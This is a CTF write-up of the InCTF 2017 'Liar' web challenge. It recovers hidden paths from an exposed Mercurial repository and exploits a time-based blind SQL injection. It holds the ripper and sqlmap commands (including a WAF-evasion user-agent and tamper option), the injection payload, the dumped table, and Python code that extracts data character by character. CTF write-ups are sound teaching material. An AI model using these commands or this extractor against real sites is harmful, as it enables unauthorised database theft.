InCTF 2017 - Write-up

Information

Version

| By    | Version | Comment  |
|-------|---------|----------|
| noraj | 1.0     | Creation |

CTF

  • Name : InCTF 2017
  • Website : ctf.inctf.in
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

300 - Liar - Web

We don't have anything in our website.

Link

There is a VCS directory exposed by the web server. Git is not the only VCS; here we have a Mercurial repository (`.hg/`). I used DVCS-ripper to dump the repository:

```
$ ~/CTF/tools/dvcs-ripper/rip-hg.pl -v -u http://liar.inctf.in/.hg/
[i] Downloading hg files from http://liar.inctf.in/.hg/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[d] found 00changelog.i
[d] found dirstate
[d] found requires
[d] found branch
[!] Not found for branchheads.cache: 404 Not Found
[d] found last-message.txt
[!] Not found for tags.cache: 404 Not Found
[d] found undo.branch
[d] found undo.desc
[d] found undo.dirstate
[d] found store/00changelog.i
[!] Not found for store/00changelog.d: 404 Not Found
[d] found store/00manifest.i
[!] Not found for store/00manifest.d: 404 Not Found
[d] found store/fncache
[d] found store/undo
[!] Not found for .hgignore: 404 Not Found
[i] Running hg status to check for missing items
[i] Got items with hg status: 3
[!] Not found for store/data/.hgignore.d: 404 Not Found
[!] Not found for store/data/.hgignore.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.i: 404 Not Found
[!] Not found for store/data/index.html.d: 404 Not Found
[d] found store/data/index.html.i
[i] Finished (1 of 4)
```

The `!` entries reported by `hg status` are paths the repository tracks (they are recorded in `.hg/dirstate`, which was downloaded) but whose contents the ripper could not fetch, because their revlogs under `.hg/store/data/` returned 404. Only the names were recovered, and that is enough: they reveal a directory on the web server that nothing else links to. (The root cause is the server exposing the dot-directory at all; nginx should deny requests for `.hg/`, `.git/` and similar paths.)

```
$ hg status
! .hgignore
! 1ts_h4rd_t0_gu3ss/index.html
! 1ts_h4rd_t0_gu3ss/vulnerable.php
```
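Why `hg status` can name files the ripper never downloaded: the names come from `.hg/dirstate`, a small binary index of every path in the working copy, which was fetched successfully even though the per-file revlogs under `store/data/` were not. The parser below is an added example (not part of this write-up and not DVCS-ripper's code) that reads a raw dirstate v1 blob and lists the tracked paths. The sample blob is constructed inline from the four paths seen above; the modes and timestamps in it are placeholders.

```python
import struct

# Mercurial dirstate v1 layout (what `hg status` reads): a 40-byte header holding
# the two parent changeset IDs, then one record per path:
#   state (1 byte: 'n' normal, 'a' added, 'r' removed, 'm' merged),
#   mode, size, mtime, path length (four big-endian int32s), then the path.
# A copied file stores "dest\0source" in the path field.
_HEADER_LEN = 40
_RECORD = struct.Struct(">cllll")


def parse_dirstate(blob: bytes):
    """Return [(state, path)] for every record in a raw .hg/dirstate file."""
    if len(blob) < _HEADER_LEN:
        raise ValueError("dirstate too short to hold the parents header")
    entries = []
    off = _HEADER_LEN
    while off < len(blob):
        state, _mode, _size, _mtime, plen = _RECORD.unpack_from(blob, off)
        off += _RECORD.size
        path = blob[off:off + plen]
        off += plen
        path = path.split(b"\0", 1)[0]   # drop the copy source, if any
        entries.append((state.decode(), path.decode()))
    return entries


def tracked_paths(blob: bytes):
    """Paths hg considers part of the working copy (everything not marked removed)."""
    return [path for state, path in parse_dirstate(blob) if state != "r"]


def build_dirstate(entries):
    """Serialise (state, path) pairs into dirstate v1 bytes so the parser can be
    exercised offline. Parents are all-zero node IDs; mode/size/mtime are filler."""
    out = bytearray(b"\0" * _HEADER_LEN)
    for state, path in entries:
        raw = path.encode()
        out += _RECORD.pack(state.encode(), 0o100644, len(raw), 0, len(raw))
        out += raw
    return bytes(out)


# Constructed sample: the paths that hg status listed for this challenge.
SAMPLE = build_dirstate([
    ("n", ".hgignore"),
    ("n", "1ts_h4rd_t0_gu3ss/index.html"),
    ("n", "1ts_h4rd_t0_gu3ss/vulnerable.php"),
    ("n", "index.html"),
])
```

On a real target, feed it the bytes of `http://<host>/.hg/dirstate`. Check `.hg/requires` first: a repository created with `dirstate-v2` uses a different on-disk format that this parser does not handle.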

`1ts_h4rd_t0_gu3ss/index.html` has a form that submits to `1ts_h4rd_t0_gu3ss/vulnerable.php`, and there is a comment hidden in the source:

```html
<!--Could You beat our security!!!--!>
<!--Can you find the phone number of my friend, I guess it is stored in some table, I think it is in phone column--!>
```

So there is an SQL injection. I tested manually whether some things were filtered. I saw that all SQL keywords were detected by a WAF, but using versioned keywords worked.

Then I tried with sqlmap, but the WAF detected an automated tool, so I told sqlmap to use a custom user-agent and to use my cookie. (The `__cfduid` cookie in the command below is set by Cloudflare, so the front-end filter was most likely Cloudflare's, which rejects sqlmap's default `User-Agent` header.)

sqlmap then confirms a classic time-based blind SQLi:

```
$ sqlmap -u http://liar.inctf.in/1ts_h4rd_t0_gu3ss/vulnerable.php --method=POST --data='name=john' --dump --user-agent='Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0' --cookie='__cfduid=da3d6e025cbfedf0e2f3e6a695f45bdaf1513502488' --tamper=versionedkeywords --dbms=mysql -v 3 --level 2 --risk 3

[...]

Parameter: name (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: name=john') OR SLEEP(5) AND ('PuTF'='PuTF
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

[...]

web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12

[...]

Database: CTF
Table: gu3ss1ng_must_n0t_h4pp3n
[5 entries]
+--------------------------------+----------------+---------+
| phone                          | email          | user    |
+--------------------------------+----------------+---------+
| 12345                          | admin@bi0s.com | <blank> |
| inctf{H0w_@b0Ut_@n_r3@L_1nJ3c} | InCTF flag     | <blank> |
| 100                            | rahul@bi0s.com | <blank> |
| 900                            | ram@google.com | <blank> |
| 123456                         | ram@yahoo.com  | <blank> |
+--------------------------------+----------------+---------+

[...]
```
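How the time-based vector above turns a delay into data, as an added example (not part of the write-up, and not sqlmap's code): a simulated `vulnerable.php` that "executes" the `OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])` shape, and an extractor that reads the `phone` column one character at a time with a binary search. The simulated table holds the values from the dump above; the inference expression, the `john')` / `('x'='x` context and the latency figure are assumptions, and nothing really sleeps.

```python
import re

# Constructed stand-in for the target: the phone column from the dump, in the
# same row order. Nothing here talks to a network or really sleeps.
PHONES = ["12345", "inctf{H0w_@b0Ut_@n_r3@L_1nJ3c}", "100", "900", "123456"]

SLEEP_TIME = 5      # seconds sqlmap asks the server to SLEEP()
LATENCY = 0.2       # assumed baseline round-trip time of a normal response
RANDNUM = 1234      # sqlmap's [RANDNUM]; any non-zero integer works

# Simplified [INFERENCE]: compare one character of one row against a threshold.
# (sqlmap's real expression also adds ORDER BY and IFNULL/CAST wrapping.)
INFERENCE = ("ORD(MID((SELECT phone FROM gu3ss1ng_must_n0t_h4pp3n "
             "LIMIT %d,1),%d,1))>%d")
_INFERENCE_RE = re.compile(
    r"ORD\(MID\(\(SELECT phone FROM gu3ss1ng_must_n0t_h4pp3n "
    r"LIMIT (\d+),1\),(\d+),1\)\)>(\d+)"
)
_PAYLOAD_RE = re.compile(
    r"^john'\) OR %d=IF\(\((.*)\),SLEEP\((\d+)\),%d\) AND \('x'='x$"
    % (RANDNUM, RANDNUM)
)


def build_payload(inference: str) -> str:
    """sqlmap's vector OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]),
    placed in the string-and-parenthesis context the detected payload established."""
    return "john') OR %d=IF((%s),SLEEP(%d),%d) AND ('x'='x" % (
        RANDNUM, inference, SLEEP_TIME, RANDNUM)


def fake_vulnerable_php(name: str) -> float:
    """Simulated vulnerable.php: returns how long the request would take.

    It only "executes" payloads of the exact shape build_payload() produces;
    anything else is a normal lookup that returns at baseline latency.
    """
    m = _PAYLOAD_RE.match(name)
    inf = _INFERENCE_RE.fullmatch(m.group(1)) if m else None
    if not inf:
        return LATENCY
    row, pos, threshold = (int(x) for x in inf.groups())
    value = PHONES[row] if row < len(PHONES) else ""
    code = ord(value[pos - 1]) if pos - 1 < len(value) else 0   # MySQL: ORD('') = 0
    return LATENCY + (int(m.group(2)) if code > threshold else 0)


def char_gt(send, row: int, pos: int, threshold: int) -> bool:
    """One oracle query: did the server sleep, i.e. is ORD(char) > threshold?"""
    elapsed = send(build_payload(INFERENCE % (row, pos, threshold)))
    return elapsed >= LATENCY + SLEEP_TIME


def extract_phone(send, row: int, max_len: int = 64) -> str:
    """Recover PHONES[row] one character at a time with a binary search over
    ASCII codes: 7 requests per character instead of up to 127."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if char_gt(send, row, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # ORD('') == 0: we ran past the end of the string
            break
        out.append(chr(lo))
    return "".join(out)
```

Against a live target the oracle is a real HTTP round-trip timed with a clock, and the threshold needs margin for jitter plus a retry on borderline timings. That is why time-based dumps are slow: about 7 requests of at least 5 s each per character.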